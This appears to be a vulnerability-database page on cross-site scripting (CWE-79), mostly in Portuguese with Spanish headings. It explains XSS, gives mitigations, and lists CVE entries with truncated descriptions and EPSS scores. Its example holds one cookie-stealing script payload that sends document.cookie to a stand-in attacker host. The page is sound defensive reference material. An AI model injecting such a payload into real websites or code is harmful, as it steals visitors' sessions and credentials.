Fallos del tipo CWE-79

28.608 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2020-5142—A stored cross-site scripting (XSS) vulnerability exists in the SonicOS SSLVPN web interface. A remote unauthenticated attacker is able to sEPSS 1.2%CVE-2023-47488MEDIUMCross Site Scripting vulnerability in Combodo iTop v.3.1.0-2-11973 allows a local attacker to obtain sensitive information via a crafted scrEPSS 1.2%CVE-2017-6764—A vulnerability in the web-based management interface of Cisco Adaptive Security Appliance (ASA) 9.5(1) could allow an authenticated, remoteEPSS 1.2%CVE-2021-24429—Salon Booking System < 6.3.1 - Unauthenticated Stored Cross-Site Scripting (XSS)EPSS 1.2%CVE-2022-3506MEDIUMCross-site Scripting (XSS) - Stored in barrykooij/related-posts-for-wpEPSS 1.2%CVE-2023-38121HIGHInductive Automation Ignition OPC UA Quick Client Cross-Site Scripting Remote Code Execution VulnerabilityEPSS 1.2%CVE-2024-8696HIGHA remote code execution (RCE) vulnerability via crafted extension publisher-url/additional-urls could be abused by a malicious extension in Docker Desktop before 4.34.2.EPSS 1.2%CVE-2017-12212—A vulnerability in the web framework of Cisco Unity Connection could allow an unauthenticated, remote attacker to conduct a reflected cross-EPSS 1.2%CVE-2021-24304—Newsmag < 5.0 - Unauthenticated Reflected Cross-site Scripting (XSS)EPSS 1.2%CVE-2017-6761—A vulnerability in the web-based management interface of Cisco Finesse 10.6(1) and 11.5(1) could allow an unauthenticated, remote attacker tEPSS 1.2%CVE-2017-6762—A vulnerability in the web-based management interface of Cisco Jabber Guest Server 10.6(9), 11.0(0), and 11.0(1) could allow an unauthenticaEPSS 1.2%CVE-2022-20659MEDIUMCisco Prime Infrastructure and Evolved Programmable Network Manager Cross-Site Scripting VulnerabilityEPSS 1.2%CVE-2020-1766LOWImproper handling of uploaded inline imagesEPSS 1.2%CVE-2018-15393MEDIUMCisco Content Security Management Appliance (SMA) Cross-Site Scripting VulnerabilityEPSS 1.2%CVE-2024-4405HIGHXiaomi Pro 13 mimarket manual-upgrade Cross-Site Scripting Remote Code Execution VulnerabilityEPSS 1.2%CVE-2021-24994—WPvivid Backup and Migration Plugin < 0.9.69 - Unauthenticated Stored Cross-Site ScriptingEPSS 1.2%CVE-2024-11432MEDIUMSuevaFree Essential Kit <= 1.1.3 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 1.2%CVE-2025-5366HIGHStored XSSEPSS 1.2%CVE-2025-5966HIGHStored XSSEPSS 1.2%CVE-2021-39205MEDIUMDOM-based XSS/Content Spoofing via Prototype PollutionEPSS 1.2%